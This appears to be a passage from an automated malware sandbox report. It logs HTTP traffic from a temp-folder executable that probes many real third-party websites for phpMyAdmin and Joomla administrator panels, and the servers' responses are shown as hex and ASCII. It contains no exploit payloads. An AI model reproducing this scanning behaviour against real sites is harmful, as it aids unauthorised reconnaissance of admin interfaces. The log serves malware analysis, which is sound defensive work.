                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.065445900 CET172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: oitacity.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.363723993 CET340INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: http://www.oitacity.jp/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                83192.168.2.45475559.106.13.82805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.065917969 CET172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: oitacity.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.371891975 CET340INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: http://www.oitacity.jp/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                84192.168.2.454789162.43.104.145805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.066029072 CET172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakacho.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.472084045 CET331INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                                                                                                                Location: https://nakacho.com/phpmyadmin/


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                85192.168.2.454807187.45.195.138805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.066595078 CET242OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: erikamoveis.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://erikamoveis.com.br/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.857557058 CET1042INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Cache-Control: No-Cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                X-Varnish: 4853603
                                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                                Via: 1.1 varnish-v4
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 30 33 30 32 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 72 65 71 75 69 72 65 28 5f 5f 44 49 52 5f 5f 2f 77 70 2d 62 6c 6f 67 2d 68 65 61 64 65 72 2e 70 68 70 29 20 5b 3c 61 20 68 72 65 66 3d 27 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 27 3e 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 3c 2f 61 3e 5d 3a 20 66 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 73 74 6f 72 61 67 65 2f 31 2f 66 31 2f 37 62 2f 65 72 69 6b 61 6d 6f 76 65 69 73 32 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 32 30 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 72 65 71 75 69 72 65 28 5f 5f 44 49 52 5f 5f 2f 77 70 2d 62 6c 6f 67 2d 68 65 61 64 65 72 2e 70 68 70 29 20 5b 3c 61 20 68 72 65 66 3d 27 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 27 3e 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 3c 2f 61 3e 5d 3a 20 66 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 73 74 6f 72 61 67 65 2f 31 2f 66 31 2f 37 62 2f 65 72 69 6b 61 6d 6f 76 65 69 73 32 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 32 30 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 72 65 71 75 69 72 65 28 29 20 5b 3c 61 20 68 72 65 66 3d 27 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 27 3e 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 3c 2f 61 3e 5d 3a 20 46 61 69 6c 65 64 20 6f 70 65 6e 69 6e 67 20 72 65 71 75 69 72 65 64 20 27 5f 5f 44 49 52 5f 5f 2f 77 70 2d 62 6c 6f 67 2d 68 65 61 64 65 72 2e 70 68 70 27 20 28 69 6e 63 6c 75 64 65 5f 70 61 74 68 3d 27 2e 3a 2f 75 73 72 2f 73 68 61 72 65 2f 70 65 61 72 27 29 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 73 74 6f 72 61 67 65 2f 31 2f 66 31 2f 37 62 2f 65 72 69 6b 61 6d 6f 76 65 69 73 32 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 32 30 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 00302<br /><b>Warning</b>: require(__DIR__/wp-blog-header.php) [<a href='function.require'>function.require</a>]: failed to open stream: No such file or directory in <b>/home/storage/1/f1/7b/erikamoveis2/public_html/index.php</b> on line <b>20</b><br /><br /><b>Warning</b>: require(__DIR__/wp-blog-header.php) [<a href='function.require'>function.require</a>]: failed to open stream: No such file or directory in <b>/home/storage/1/f1/7b/erikamoveis2/public_html/index.php</b> on line <b>20</b><br /><br /><b>Fatal error</b>: require() [<a href='function.require'>function.require</a>]: Failed opening required '__DIR__/wp-blog-header.php' (include_path='.:/usr/share/pear') in <b>/home/storage/1/f1/7b/erikamoveis2/public_html/index.php</b> on line <b>20</b><br />
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.857717991 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                86192.168.2.45484783.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.336925030 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.587472916 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.587733030 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.846414089 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=nnixf8dqws36twc4d14da4a9v4; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-496
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                87192.168.2.45484883.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.336930037 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.587987900 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.588186026 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.847645998 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=gscxevnha0r10ja4d14da4apzn; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-497
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                88192.168.2.45484983.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.340679884 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.591538906 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.591726065 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.851630926 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=fd44t8ehzmshguq4d14da4a9jj; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-497
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                89192.168.2.45484683.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.342299938 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.597232103 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.597914934 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.861481905 CET472INHTTP/1.1 301 Moved Permanently
